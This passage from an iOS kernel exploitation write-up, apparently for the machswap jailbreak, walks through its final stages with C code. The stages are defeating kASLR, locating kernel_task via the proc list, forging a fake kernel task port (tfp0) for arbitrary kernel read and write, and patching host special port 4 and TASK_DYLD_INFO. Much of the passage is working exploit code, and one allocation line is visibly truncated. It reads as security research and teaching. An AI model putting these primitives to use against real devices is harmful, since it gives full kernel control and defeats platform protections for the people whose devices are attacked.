rk32(kernel_base, kbase_value);
if (kbase_value == MH_MAGIC_64)
{
LOG("found kernel_base: 0x%llx", kernel_base);
break;
}
kernel_base -= KERNEL_SLIDE_STEP;
} while (true);
uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;
As we have deduced the kslide value, kASLR has now been defeated, and we continue with our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.
0x08 Building a Fake Kernel Task Port
A kernel task port is simply a ipc_port struct of type IKOT_TASK
, with a representation of the kernel’s task_t struct attached. However, when using the task port in the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs. We can simply forge arbitrary ones containing the minimum of data filled out in order for the Mach API to recognise it as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s vm_map_t
, which is a struct that holds data about the kernel’s virtual address space.
The kernel implements a nice feature which allows you to easily loop through proc_t
structs (and hence their corresponding task_t
counterparts) to find target processes, via a linked list (p_list
) at the start of the proc_t
struct. This includes the kernel’s proc and task structs (kernel_task
actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).
We already have the address of our own task_t
from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the bsd_info
pointer to get the corresponding proc_t
struct, and then loop backward through the list until we reach the first entry, kernel_task
.
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
[...]
uint64_t kernproc = ourproc;
while (kernproc != 0x0)
{
uint32_t found_pid = 0x0;
rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);
if (found_pid == 0)
{
break;
}
/*
kernproc will always be at the start of the linked list,
so we loop backwards in order to find it
*/
rk64(kernproc + 0x0, kernproc);
}
From there we can read proc_t->task
to get to the kernel’s task_t
struct, which contains a field which is a pointer to the kernel’s vm_map_t
:
struct task {
/* Synchronization/destruction information */
decl_lck_mtx_data(,lock) /* Task's lock */
_Atomic uint32_t ref_count; /* Number of references to me */
boolean_t active; /* Task has not been terminated */
boolean_t halting; /* Task is being halted */
/* Virtual timers */
uint32_t vtimers;
/* Miscellaneous */
vm_map_t map; /* Address space description */
queue_chain_t tasks; /* global list of tasks */
[...]
To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel vm_map
pointer:
fake_task->lock.data = 0x0;
fake_task->lock.type = 0x22;
fake_task->ref_count = 100;
fake_task->active = 1;
fake_task->map = kernel_vm_map;
*(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;
We also need to find the kernel’s ip_receiver
, which is a struct where Mach messages that have not yet been received (ie. are in transit) are stored. This is easy to find however, as the receiver of our IOSurfaceUserClient is the kernel (as this is where messages are sent to on that port).
/*
since our IOSurfaceRoot userclient is owned by kernel, the
ip_receiver field will point to kernel's ipc space
*/
uint64_t ipc_space_kernel = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);
We then temporarily turn our fakeport (the_one
) into a kernel task port by updating it’s ip_receiver
, which we can then use as an early tfp0 primitive in order to allocate and write some memory, for our kernel task and kernel port structs (error checking omitted):
/* the_one should now have access to kernel mem */
uint64_t kbase_data = kread64(the_one, kernel_base);
LOG("got kernel base: %llx", kbase_data);
/* allocate kernel task */
uint64_t kernel_task_buf = kalloc(the_one, 0x600);
LOG("kernel_task_buf: 0x%llx", kernel_task_buf);
kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);
/* allocate kernel port */
uint64_t kernel_port_buf = kalloc(the_one, 0x3
LOG("kernel_port_buf: 0x%llx", kernel_port_buf);
fakeport->ip_kobject = kernel_task_buf;
kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);
Our fakeport the_one
is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.
0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch
There are a couple more finishing touches we need to do before we can exit our exploit. The first is setting up the hsp4 (host_get_special_port(..., 4, ...)
) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).
This is fairly easy to set up, we simply need to perform a write to the realhost
struct, into the ipc_port_t special
array.
struct host {
decl_lck_mtx_data(,lock) /* lock to protect exceptions */
ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
struct exception_action exc_actions[EXC_TYPES_COUNT];
};
/*
host_get_special_port(4) patch
allows the kernel task port to be accessed by any root process
*/
kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the host_special
API requires root access.
Note: we also de-elevate back to the mobile user before exiting the exploit as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.
Another (new) patch is the TASK_DYLD_INFO
patch, suggested by @Siguza here. The task_info
API allows an application to retrieve information about a specific process, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the task
back to userland.
case TASK_DYLD_INFO:
{
task_dyld_info_t info;
[...]
info = (task_dyld_info_t)task_info_out;
info->all_image_info_addr = task->all_image_info_addr;
info->all_image_info_size = task->all_image_info_size;
/* only set format on output for those expecting it */
if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
info->all_image_info_format = task_has_64Bit_addr(task) ?
TASK_DYLD_ALL_IMAGE_INFO_64 :
TASK_DYLD_ALL_IMAGE_INFO_32 ;
*task_info_count = TASK_DYLD_INFO_COUNT;
} else {
*task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
}
break;
}
Since the kernel doesn’t use DYLD, nor will our fake task port ever be used by the kernel itself, we can use these fields to store data about the kernel. In this case, we can use the all_image_info_addr
field to store the slid base address of the kernel, and the all_image_info_size
field to store the kernel slide. This helps alleviate the use of offset-storing files and provides a clean method to find the (previously somewhat tricky to deduce) kernel slide.
/*
task_info TASK_DYLD_INFO patch
this patch (credit @Siguza) allows you to provide tfp0 to the task_info
API, and retreive some data from the kernel's task struct
we use it for storing the kernel base and kernel slide values
*/
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;
You can then call task_info
, providing tfp0 as your port and supplying the TASK_DYLD_INFO
flag.
0x0A: Closing Words
For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to their exploitational simplicity and consistency, and would love to find one as a 0day one day. ;)
Of course thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the intial bug details and PoC code. You can find their Twitter handles below.
If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!
Twitter: https://twitter.com/iBSparkes
GitHub: https://github.com/PsychoTea
machswap Source Code: https://github.com/PsychoTea/machswap
machswap2 (SMAP Version): https://github.com/PsychoTea/machswap2
@s1guza: https://twitter.com/s1guza
@littlelailo: https://twitter.com/littlelailo
@stek29: https://twitter.com/stek29
@s0rrymybad: https://twitter.com/s0rrymybad